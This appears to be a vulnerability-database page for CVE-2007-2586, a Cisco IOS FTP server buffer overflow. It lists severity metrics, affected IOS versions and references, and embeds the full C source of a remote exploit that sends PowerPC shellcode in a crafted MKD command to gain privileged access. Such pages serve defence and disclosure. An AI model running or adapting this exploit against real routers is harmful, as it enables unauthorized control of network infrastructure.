CVE-2007-2586 : Detail

CVE-2007-2586

Authorization problems
A01-Broken Access Control
74.54%V3
Network
2007-05-09
20h00 +00:00
2017-10-09
22h57 +00:00
CVE.org
NVD
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

The FTP Server in Cisco IOS 11.3 through 12.4 does not properly check user authorization, which allows remote attackers to execute arbitrary code, and have other impact including reading startup-config, as demonstrated by a crafted MKD command that involves access to a VTY device and overflows a buffer, aka bug ID CSCek55259.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-863 Incorrect Authorization
The product performs an authorization check when an actor attempts to access a resource or perform an action, but it does not correctly perform the check.

Metrics

Metrics Score Severity CVSS Vector Source
V2 9.3 AV:N/AC:M/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
EPSS First.org

Exploit information

Exploit Database EDB-ID : 6155

Publication date : 2008-07-28 22h00 +00:00
Author : Andy Davis
EDB Verified : Yes

/* Cisco IOS FTP server remote exploit by Andy Davis 2008 Cisco Advisory ID: cisco-sa-20070509-iosftp - May 2007 Specific hard-coded addresses for IOS 12.3(18) on a 2621XM router Removes the requirement to authenticate and escalates to level 15 ********************************************************************* To protect the innocent a critical step has been omitted, which means the shellcode will only execute when the router is attached to gdb. I'm sure the PowerPC shellcoders out there will work it out... ********************************************************************* Thanks to Gyan Chawdhary and Varun Uppal for all the hours they spent on the original IOS security research iosftpexploit <at> googlemail 'dot' com */ #include <sys/socket.h> #include <netinet/in.h> #include <stdio.h> #include <stdlib.h> #define PORT 21 int main(int argc, char **argv) { unsigned char sendbuf[] = "MKD " /* .equ vty_info, 0x8182da60 # pointer to VTY info */ /* .equ terminate, 0x80e4086c # kill a process */ "\x3c\x80\x81\x83" /* lis 4,vty_info@ha */ "\x38\x84\xda\x60" /* la 4,vty_info@l(4) */ "\x7d\x08\x42\x78" /* xor 8,8,8 */ "\x7c\xe4\x40\x2e" /* lwzx 7,4,8 */ "\x91\x07\x01\x74" /* stw 8,372(7) */ "\x39\x08\xff\xff" /* subi 8,8,1 */ "\x38\xe7\x09\x1a" /* addi 7,7,233 */ "\x91\x07\x04\xca" /* stw 8,1226(7) */ "\x7d\x03\x43\x78" /* mr 3,8 */ "\x3c\x80\x80\xe4" /* lis 4,terminate@ha */ "\x38\x84\x08\x6c" /* la 4,terminate@l(4) */ "\x7c\x89\x03\xa6" /* mtctr 4 */ "\x4e\x80\x04\x20" /* bctr */ /* exists cleanly without adversely affecting the FTP server */ "\x61\x61\x61\x61" /* padding */ "\x61\x61\x61\x61" /* padding */ "\x61\x61\x61\x61" /* padding */ "\x61\x61\x61\x61" /* padding */ "\x61\x61\x61\x61" /* padding */ "\x61\x61\x61\x61" /* padding */ "\x80\x06\x23\xB8" /* return address */ "\x0d\x0a"; /* trampoline code */ /* when the overflow occurs r26+0x14 points to the shellcode */ /* 0x800623B8 lwz 26, 20(26) 0x800623BC mtctr 26 0x800623C0 mr 3, 27 0x800623C4 bctrl */ unsigned char recvbuf[256]; struct sockaddr_in servaddr; int s; if (argc != 2) { printf ("\nCisco IOS FTP server remote exploit by Andy Davis 2008\n"); printf ("\nUsage: %s <target IP address>\n",argv[0]); exit(-1); } servaddr.sin_family = AF_INET; servaddr.sin_addr.s_addr = inet_addr(argv[1]); servaddr.sin_port = htons(PORT); s = socket(AF_INET, SOCK_STREAM, 0); connect (s, (struct sockaddr *) &servaddr, sizeof(servaddr)); printf ("\nCisco IOS FTP server remote exploit by Andy Davis 2008\n"); printf ("Specific offsets for IOS 12.3(18) on a 2621XM router\n\n"); printf ("Sending exploit...\n\n"); if (send(s, sendbuf, sizeof(sendbuf)-1, 0) == 0) { printf("Error sending packet...quitting\n\n"); exit (1); } recv (s, recvbuf, sizeof(recvbuf)-1,0); printf ("Now telnet to the router for a shell...\n\n"); } // milw0rm.com [2008-07-29]

Products Mentioned

Configuraton 0

Cisco>>Ios >> Version 12.0\(1\)t

Cisco>>Ios >> Version 12.0\(1\)t1

Cisco>>Ios >> Version 12.0\(1\)xe

Cisco>>Ios >> Version 12.0\(2\)s

Cisco>>Ios >> Version 12.0\(2\)t

Cisco>>Ios >> Version 12.0\(2\)t1

Cisco>>Ios >> Version 12.0\(2\)xe

Cisco>>Ios >> Version 12.0\(2\)xe1

Cisco>>Ios >> Version 12.0\(2\)xe3

Cisco>>Ios >> Version 12.0\(2\)xe4

Cisco>>Ios >> Version 12.0\(2a\)t1

Cisco>>Ios >> Version 12.0\(3\)s

Cisco>>Ios >> Version 12.0\(3\)t

Cisco>>Ios >> Version 12.0\(3\)t2

Cisco>>Ios >> Version 12.0\(3\)t3

Cisco>>Ios >> Version 12.0\(4\)s

Cisco>>Ios >> Version 12.0\(4\)t

Cisco>>Ios >> Version 12.0\(4\)xe

Cisco>>Ios >> Version 12.0\(4\)xe2

Cisco>>Ios >> Version 12.0\(5\)s

Cisco>>Ios >> Version 12.0\(5\)t

Cisco>>Ios >> Version 12.0\(5\)t1

Cisco>>Ios >> Version 12.0\(5\)xe

Cisco>>Ios >> Version 12.0\(5\)xe1

Cisco>>Ios >> Version 12.0\(5\)xe2

Cisco>>Ios >> Version 12.0\(5\)xe3

Cisco>>Ios >> Version 12.0\(5\)xe4

Cisco>>Ios >> Version 12.0\(5\)xe5

Cisco>>Ios >> Version 12.0\(5\)xe8

Cisco>>Ios >> Version 12.0\(5\)xk

Cisco>>Ios >> Version 12.0\(5\)xk1

Cisco>>Ios >> Version 12.0\(5\)xk2

Cisco>>Ios >> Version 12.0\(5\)xt1

Cisco>>Ios >> Version 12.0\(6\)s

Cisco>>Ios >> Version 12.0\(6\)s1

Cisco>>Ios >> Version 12.0\(6\)s2

Cisco>>Ios >> Version 12.0\(7\)s

Cisco>>Ios >> Version 12.0\(7\)s1

Cisco>>Ios >> Version 12.0\(7\)t

Cisco>>Ios >> Version 12.0\(7\)t1

Cisco>>Ios >> Version 12.0\(7\)t2

Cisco>>Ios >> Version 12.0\(7\)t3

Cisco>>Ios >> Version 12.0\(7\)xk

Cisco>>Ios >> Version 12.0\(7\)xk1

Cisco>>Ios >> Version 12.0\(7\)xk2

Cisco>>Ios >> Version 12.0\(7\)xk3

Cisco>>Ios >> Version 12.0\(8\)s

Cisco>>Ios >> Version 12.0\(8\)s1

Cisco>>Ios >> Version 12.0\(9\)s

Cisco>>Ios >> Version 12.0\(9\)s8

Cisco>>Ios >> Version 12.0\(9\)st

Cisco>>Ios >> Version 12.0\(10\)s

Cisco>>Ios >> Version 12.0\(10\)s1

Cisco>>Ios >> Version 12.0\(10\)s2

Cisco>>Ios >> Version 12.0\(10\)s3

Cisco>>Ios >> Version 12.0\(10\)s3b

Cisco>>Ios >> Version 12.0\(10\)s4

Cisco>>Ios >> Version 12.0\(10\)s5

Cisco>>Ios >> Version 12.0\(10\)s6

Cisco>>Ios >> Version 12.0\(10\)s7

Cisco>>Ios >> Version 12.0\(10\)s8

Cisco>>Ios >> Version 12.0\(10\)st

Cisco>>Ios >> Version 12.0\(10\)st1

Cisco>>Ios >> Version 12.0\(10\)st2

Cisco>>Ios >> Version 12.0\(11\)s

Cisco>>Ios >> Version 12.0\(11\)s1

Cisco>>Ios >> Version 12.0\(11\)s2

Cisco>>Ios >> Version 12.0\(11\)s3

Cisco>>Ios >> Version 12.0\(11\)s4

Cisco>>Ios >> Version 12.0\(11\)s5

Cisco>>Ios >> Version 12.0\(11\)s6

Cisco>>Ios >> Version 12.0\(11\)st

Cisco>>Ios >> Version 12.0\(11\)st1

Cisco>>Ios >> Version 12.0\(11\)st2

Cisco>>Ios >> Version 12.0\(11\)st3

Cisco>>Ios >> Version 12.0\(11\)st4

Cisco>>Ios >> Version 12.0\(28\)s4a

Cisco>>Ios >> Version 12.0\(31\)sz2

Cisco>>Ios >> Version 12.1\(3\)xi

Cisco>>Ios >> Version 12.1\(5\)xm

Cisco>>Ios >> Version 12.1\(5\)xm1

Cisco>>Ios >> Version 12.1\(5\)xm2

Cisco>>Ios >> Version 12.1\(5\)xm3

Cisco>>Ios >> Version 12.1\(5\)xm4

Cisco>>Ios >> Version 12.1\(5\)xm5

Cisco>>Ios >> Version 12.1\(5\)xm7

Cisco>>Ios >> Version 12.1\(5\)xm8

Cisco>>Ios >> Version 12.1\(5c\)ex

Cisco>>Ios >> Version 12.1\(5c\)ex1

Cisco>>Ios >> Version 12.1\(6\)ex

Cisco>>Ios >> Version 12.1\(8b\)ex4

Cisco>>Ios >> Version 12.1\(9\)ex

Cisco>>Ios >> Version 12.2\(8\)zb

Cisco>>Ios >> Version 12.2\(9\)yo

Cisco>>Ios >> Version 12.2\(9\)yo1

Cisco>>Ios >> Version 12.2\(9\)yo2

Cisco>>Ios >> Version 12.2\(9\)yo3

Cisco>>Ios >> Version 12.2\(9\)yo4

Cisco>>Ios >> Version 12.2\(11\)yz

Cisco>>Ios >> Version 12.2\(11\)yz1

Cisco>>Ios >> Version 12.2\(11\)yz2

Cisco>>Ios >> Version 12.2\(11\)yz3

Cisco>>Ios >> Version 12.2\(12b\)m1

Cisco>>Ios >> Version 12.2\(12h\)m1

Cisco>>Ios >> Version 12.2\(13\)zf

Cisco>>Ios >> Version 12.2\(13\)zf1

Cisco>>Ios >> Version 12.2\(13\)zf2

Cisco>>Ios >> Version 12.2\(13\)zh

Cisco>>Ios >> Version 12.2\(13\)zh1

Cisco>>Ios >> Version 12.2\(13\)zh2

Cisco>>Ios >> Version 12.2\(13\)zh3

Cisco>>Ios >> Version 12.2\(13\)zh4

Cisco>>Ios >> Version 12.2\(13\)zh5

Cisco>>Ios >> Version 12.2\(13b\)m1

Cisco>>Ios >> Version 12.2\(13b\)m2

Cisco>>Ios >> Version 12.2\(14\)sz

Cisco>>Ios >> Version 12.2\(14\)sz1

Cisco>>Ios >> Version 12.2\(14\)sz2

Cisco>>Ios >> Version 12.2\(14\)sz3

Cisco>>Ios >> Version 12.2\(14\)sz4

Cisco>>Ios >> Version 12.2\(14\)sz5

Cisco>>Ios >> Version 12.2\(14\)sz6

Cisco>>Ios >> Version 12.2\(15\)zj

Cisco>>Ios >> Version 12.2\(15\)zj1

Cisco>>Ios >> Version 12.2\(15\)zj2

Cisco>>Ios >> Version 12.2\(15\)zj3

Cisco>>Ios >> Version 12.2\(15\)zj4

Cisco>>Ios >> Version 12.2\(15\)zj5

Cisco>>Ios >> Version 12.2\(15\)zl

Cisco>>Ios >> Version 12.2\(15\)zl1

Cisco>>Ios >> Version 12.2\(15\)zn

Cisco>>Ios >> Version 12.2\(18\)s

Cisco>>Ios >> Version 12.2\(18\)s1

Cisco>>Ios >> Version 12.2\(18\)s2

Cisco>>Ios >> Version 12.2\(18\)s3

Cisco>>Ios >> Version 12.2\(18\)s4

Cisco>>Ios >> Version 12.2\(20\)s

Cisco>>Ios >> Version 12.2\(20\)s1

Cisco>>Ios >> Version 12.2\(20\)s2

Cisco>>Ios >> Version 12.2\(20\)s2a

Cisco>>Ios >> Version 12.2\(20\)s3

Cisco>>Ios >> Version 12.2\(20\)s4

Cisco>>Ios >> Version 12.2\(20\)s4a

Cisco>>Ios >> Version 12.2\(20\)s5

Cisco>>Ios >> Version 12.2\(20\)s6

Cisco>>Ios >> Version 12.2\(22\)s

Cisco>>Ios >> Version 12.2\(25\)s

Cisco>>Ios >> Version 12.2\(25\)s1

Cisco>>Ios >> Version 12.2\(25\)s2

Cisco>>Ios >> Version 12.2\(25\)se

Cisco>>Ios >> Version 12.3\(1a\)b

Cisco>>Ios >> Version 12.3\(2\)ja3

Cisco>>Ios >> Version 12.3\(2\)ja4

Cisco>>Ios >> Version 12.3\(2\)t

Cisco>>Ios >> Version 12.3\(2\)t1

Cisco>>Ios >> Version 12.3\(2\)t2

Cisco>>Ios >> Version 12.3\(2\)t3

Cisco>>Ios >> Version 12.3\(2\)t4

Cisco>>Ios >> Version 12.3\(2\)t5

Cisco>>Ios >> Version 12.3\(2\)t6

Cisco>>Ios >> Version 12.3\(2\)t7

Cisco>>Ios >> Version 12.3\(2\)t8

Cisco>>Ios >> Version 12.3\(2\)t9

Cisco>>Ios >> Version 12.3\(2\)xa

Cisco>>Ios >> Version 12.3\(2\)xa1

Cisco>>Ios >> Version 12.3\(2\)xa2

Cisco>>Ios >> Version 12.3\(2\)xa3

Cisco>>Ios >> Version 12.3\(2\)xa4

Cisco>>Ios >> Version 12.3\(2\)xa5

Cisco>>Ios >> Version 12.3\(2\)xc

Cisco>>Ios >> Version 12.3\(2\)xc1

Cisco>>Ios >> Version 12.3\(2\)xc2

Cisco>>Ios >> Version 12.3\(2\)xe

Cisco>>Ios >> Version 12.3\(2\)xe1

Cisco>>Ios >> Version 12.3\(2\)xe2

Cisco>>Ios >> Version 12.3\(2\)xe3

Cisco>>Ios >> Version 12.3\(2\)xe4

Cisco>>Ios >> Version 12.3\(2\)xf

Cisco>>Ios >> Version 12.3\(3\)b

Cisco>>Ios >> Version 12.3\(3\)b1

Cisco>>Ios >> Version 12.3\(4\)t

Cisco>>Ios >> Version 12.3\(4\)t1

Cisco>>Ios >> Version 12.3\(4\)t2

Cisco>>Ios >> Version 12.3\(4\)t3

Cisco>>Ios >> Version 12.3\(4\)t4

Cisco>>Ios >> Version 12.3\(4\)t5

Cisco>>Ios >> Version 12.3\(4\)t6

Cisco>>Ios >> Version 12.3\(4\)t7

Cisco>>Ios >> Version 12.3\(4\)t8

Cisco>>Ios >> Version 12.3\(4\)t9

Cisco>>Ios >> Version 12.3\(4\)t10

Cisco>>Ios >> Version 12.3\(4\)t11

Cisco>>Ios >> Version 12.3\(4\)tpc11a

Cisco>>Ios >> Version 12.3\(4\)xd

Cisco>>Ios >> Version 12.3\(4\)xd1

Cisco>>Ios >> Version 12.3\(4\)xd2

Cisco>>Ios >> Version 12.3\(4\)xd3

Cisco>>Ios >> Version 12.3\(4\)xd4

Cisco>>Ios >> Version 12.3\(4\)xg

Cisco>>Ios >> Version 12.3\(4\)xg1

Cisco>>Ios >> Version 12.3\(4\)xg2

Cisco>>Ios >> Version 12.3\(4\)xg3

Cisco>>Ios >> Version 12.3\(4\)xg4

Cisco>>Ios >> Version 12.3\(4\)xg5

Cisco>>Ios >> Version 12.3\(4\)xh

Cisco>>Ios >> Version 12.3\(4\)xh1

Cisco>>Ios >> Version 12.3\(4\)xk

Cisco>>Ios >> Version 12.3\(4\)xk1

Cisco>>Ios >> Version 12.3\(4\)xk2

Cisco>>Ios >> Version 12.3\(4\)xk3

Cisco>>Ios >> Version 12.3\(4\)xk4

Cisco>>Ios >> Version 12.3\(4\)xq

Cisco>>Ios >> Version 12.3\(4\)xq1

Cisco>>Ios >> Version 12.3\(4\)ye

Cisco>>Ios >> Version 12.3\(4\)ye1

Cisco>>Ios >> Version 12.3\(5a\)b

Cisco>>Ios >> Version 12.3\(5a\)b0a

Cisco>>Ios >> Version 12.3\(5a\)b1

Cisco>>Ios >> Version 12.3\(5a\)b2

Cisco>>Ios >> Version 12.3\(5a\)b3

Cisco>>Ios >> Version 12.3\(5a\)b4

Cisco>>Ios >> Version 12.3\(5a\)b5

Cisco>>Ios >> Version 12.3\(7\)jx9

Cisco>>Ios >> Version 12.3\(7\)t

Cisco>>Ios >> Version 12.3\(7\)t1

Cisco>>Ios >> Version 12.3\(7\)t2

Cisco>>Ios >> Version 12.3\(7\)t3

Cisco>>Ios >> Version 12.3\(7\)t4

Cisco>>Ios >> Version 12.3\(7\)t6

Cisco>>Ios >> Version 12.3\(7\)t7

Cisco>>Ios >> Version 12.3\(7\)t8

Cisco>>Ios >> Version 12.3\(7\)t9

Cisco>>Ios >> Version 12.3\(7\)t10

Cisco>>Ios >> Version 12.3\(7\)t11

Cisco>>Ios >> Version 12.3\(7\)t12

Cisco>>Ios >> Version 12.3\(7\)xi3a

Cisco>>Ios >> Version 12.3\(7\)xl

Cisco>>Ios >> Version 12.3\(7\)xr

Cisco>>Ios >> Version 12.3\(7\)xr1

Cisco>>Ios >> Version 12.3\(7\)xr2

Cisco>>Ios >> Version 12.3\(7\)xr3

Cisco>>Ios >> Version 12.3\(7\)xr4

Cisco>>Ios >> Version 12.3\(7\)xr5

Cisco>>Ios >> Version 12.3\(7\)xr6

Cisco>>Ios >> Version 12.3\(7\)xs

Cisco>>Ios >> Version 12.3\(7\)xs1

Cisco>>Ios >> Version 12.3\(7\)xs2

Cisco>>Ios >> Version 12.3\(8\)jk

Cisco>>Ios >> Version 12.3\(8\)t

Cisco>>Ios >> Version 12.3\(8\)t1

Cisco>>Ios >> Version 12.3\(8\)t2

Cisco>>Ios >> Version 12.3\(8\)t3

Cisco>>Ios >> Version 12.3\(8\)t4

Cisco>>Ios >> Version 12.3\(8\)t5

Cisco>>Ios >> Version 12.3\(8\)t6

Cisco>>Ios >> Version 12.3\(8\)t7

Cisco>>Ios >> Version 12.3\(8\)t8

Cisco>>Ios >> Version 12.3\(8\)t9

Cisco>>Ios >> Version 12.3\(8\)t10

Cisco>>Ios >> Version 12.3\(8\)t11

Cisco>>Ios >> Version 12.3\(8\)xx

Cisco>>Ios >> Version 12.3\(8\)xx1

Cisco>>Ios >> Version 12.3\(8\)xx2

Cisco>>Ios >> Version 12.3\(8\)xx2a

Cisco>>Ios >> Version 12.3\(8\)xx2b

Cisco>>Ios >> Version 12.3\(8\)xx2c

Cisco>>Ios >> Version 12.3\(8\)ya

Cisco>>Ios >> Version 12.3\(8\)ya1

Cisco>>Ios >> Version 12.3\(8\)yc

Cisco>>Ios >> Version 12.3\(8\)yc1

Cisco>>Ios >> Version 12.3\(8\)yc2

Cisco>>Ios >> Version 12.3\(8\)yc3

Cisco>>Ios >> Version 12.3\(8\)yd

Cisco>>Ios >> Version 12.3\(8\)yd1

Cisco>>Ios >> Version 12.3\(8\)yg

Cisco>>Ios >> Version 12.3\(8\)yg1

Cisco>>Ios >> Version 12.3\(8\)yg2

Cisco>>Ios >> Version 12.3\(8\)yg3

Cisco>>Ios >> Version 12.3\(8\)yg4

Cisco>>Ios >> Version 12.3\(8\)yg5

Cisco>>Ios >> Version 12.3\(8\)yh

Cisco>>Ios >> Version 12.3\(8\)yi

Cisco>>Ios >> Version 12.3\(8\)yi1

Cisco>>Ios >> Version 12.3\(8\)yi2

Cisco>>Ios >> Version 12.3\(8\)yi3

Cisco>>Ios >> Version 12.3\(8\)za

Cisco>>Ios >> Version 12.3\(9\)m0

Cisco>>Ios >> Version 12.3\(9\)m1

Cisco>>Ios >> Version 12.3\(10a\)m0

Cisco>>Ios >> Version 12.3\(11\)ja2

Cisco>>Ios >> Version 12.3\(11\)jx

Cisco>>Ios >> Version 12.3\(11\)jx1

Cisco>>Ios >> Version 12.3\(11\)t

Cisco>>Ios >> Version 12.3\(11\)t1

Cisco>>Ios >> Version 12.3\(11\)t2

Cisco>>Ios >> Version 12.3\(11\)t3

Cisco>>Ios >> Version 12.3\(11\)t4

Cisco>>Ios >> Version 12.3\(11\)t5

Cisco>>Ios >> Version 12.3\(11\)t6

Cisco>>Ios >> Version 12.3\(11\)t7

Cisco>>Ios >> Version 12.3\(11\)t8

Cisco>>Ios >> Version 12.3\(11\)t9

Cisco>>Ios >> Version 12.3\(11\)t10

Cisco>>Ios >> Version 12.3\(11\)t11

Cisco>>Ios >> Version 12.3\(11\)to3

Cisco>>Ios >> Version 12.3\(11\)xl

Cisco>>Ios >> Version 12.3\(11\)xl1

Cisco>>Ios >> Version 12.3\(11\)xl2

Cisco>>Ios >> Version 12.3\(11\)xl3

Cisco>>Ios >> Version 12.3\(11\)yf2

Cisco>>Ios >> Version 12.3\(11\)yk

Cisco>>Ios >> Version 12.3\(11\)yk1

Cisco>>Ios >> Version 12.3\(11\)yk2

Cisco>>Ios >> Version 12.3\(11\)yl

Cisco>>Ios >> Version 12.3\(11\)yl1

Cisco>>Ios >> Version 12.3\(11\)yl2

Cisco>>Ios >> Version 12.3\(11\)ys

Cisco>>Ios >> Version 12.3\(11\)ys1

Cisco>>Ios >> Version 12.3\(11\)yz

Cisco>>Ios >> Version 12.3\(11\)yz1

Cisco>>Ios >> Version 12.3\(11\)zb

Cisco>>Ios >> Version 12.3\(11\)zb1

Cisco>>Ios >> Version 12.3\(14\)t

Cisco>>Ios >> Version 12.3\(14\)t1

Cisco>>Ios >> Version 12.3\(14\)t2

Cisco>>Ios >> Version 12.3\(14\)t3

Cisco>>Ios >> Version 12.3\(14\)t4

Cisco>>Ios >> Version 12.3\(14\)t5

Cisco>>Ios >> Version 12.3\(14\)t6

Cisco>>Ios >> Version 12.3\(14\)t7

Cisco>>Ios >> Version 12.3\(14\)ym2

Cisco>>Ios >> Version 12.3\(14\)ym3

Cisco>>Ios >> Version 12.3\(14\)ym4

Cisco>>Ios >> Version 12.3\(14\)ym5

Cisco>>Ios >> Version 12.3\(14\)ym6

Cisco>>Ios >> Version 12.3\(14\)ym7

Cisco>>Ios >> Version 12.3\(14\)ym8

Cisco>>Ios >> Version 12.3\(14\)ym9

Cisco>>Ios >> Version 12.3\(14\)yt

Cisco>>Ios >> Version 12.3\(14\)yt1

Cisco>>Ios >> Version 12.4\(2\)t

Cisco>>Ios >> Version 12.4\(2\)t1

Cisco>>Ios >> Version 12.4\(2\)t2

Cisco>>Ios >> Version 12.4\(2\)t3

Cisco>>Ios >> Version 12.4\(2\)t4

Cisco>>Ios >> Version 12.4\(2\)t5

Cisco>>Ios >> Version 12.4\(2\)xa

Cisco>>Ios >> Version 12.4\(2\)xa1

Cisco>>Ios >> Version 12.4\(2\)xa2

Cisco>>Ios >> Version 12.4\(4\)t

Cisco>>Ios >> Version 12.4\(4\)t1

Cisco>>Ios >> Version 12.4\(4\)t2

Cisco>>Ios >> Version 12.4\(4\)t3

Cisco>>Ios >> Version 12.4\(4\)t4

Cisco>>Ios >> Version 12.4\(4\)t5

Cisco>>Ios >> Version 12.4\(4\)xc

Cisco>>Ios >> Version 12.4\(4\)xc1

Cisco>>Ios >> Version 12.4\(4\)xc2

Cisco>>Ios >> Version 12.4\(4\)xc3

Cisco>>Ios >> Version 12.4\(4\)xc4

Cisco>>Ios >> Version 12.4\(4\)xc5

Cisco>>Ios >> Version 12.4\(4\)xd

Cisco>>Ios >> Version 12.4\(4\)xd1

Cisco>>Ios >> Version 12.4\(4\)xd2

Cisco>>Ios >> Version 12.4\(4\)xd3

Cisco>>Ios >> Version 12.4\(5a\)m0

Cisco>>Ios >> Version 12.4\(6\)t

Cisco>>Ios >> Version 12.4\(6\)t1

Cisco>>Ios >> Version 12.4\(6\)t2

Cisco>>Ios >> Version 12.4\(6\)t3

Cisco>>Ios >> Version 12.4\(6\)t4

Cisco>>Ios >> Version 12.4\(6\)t5

Cisco>>Ios >> Version 12.4\(6\)xe

Cisco>>Ios >> Version 12.4\(6\)xe1

Cisco>>Ios >> Version 12.4\(6\)xe2

Cisco>>Ios >> Version 12.4\(9\)t

Cisco>>Ios >> Version 12.4\(9\)t0a

Cisco>>Ios >> Version 12.4\(9\)t1

Cisco>>Ios >> Version 12.4\(11\)sw

Cisco>>Ios >> Version 12.4\(11\)sw1

References

http://www.securityfocus.com/archive/1/494868
Tags : mailing-list, x_refsource_BUGTRAQ
http://www.vupen.com/english/advisories/2007/1749
Tags : vdb-entry, x_refsource_VUPEN
http://secunia.com/advisories/25199
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.securitytracker.com/id?1018030
Tags : vdb-entry, x_refsource_SECTRACK
http://www.securityfocus.com/bid/23885
Tags : vdb-entry, x_refsource_BID
http://seclists.org/bugtraq/2009/Jan/0183.html
Tags : mailing-list, x_refsource_BUGTRAQ
http://www.exploit-db.com/exploits/6155
Tags : exploit, x_refsource_EXPLOIT-DB
http://www.osvdb.org/35334
Tags : vdb-entry, x_refsource_OSVDB